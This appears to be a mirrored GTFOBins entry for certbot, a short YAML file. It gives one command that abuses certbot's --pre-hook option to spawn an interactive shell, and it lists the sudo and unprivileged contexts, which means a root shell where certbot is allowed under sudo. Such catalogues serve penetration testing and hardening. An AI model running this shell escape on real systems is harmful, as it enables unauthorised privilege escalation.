mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
12 lines
313 B
Plaintext
12 lines
313 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'
|
|
comment: |-
|
|
This needs a writable directory, replace `.` if needed.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|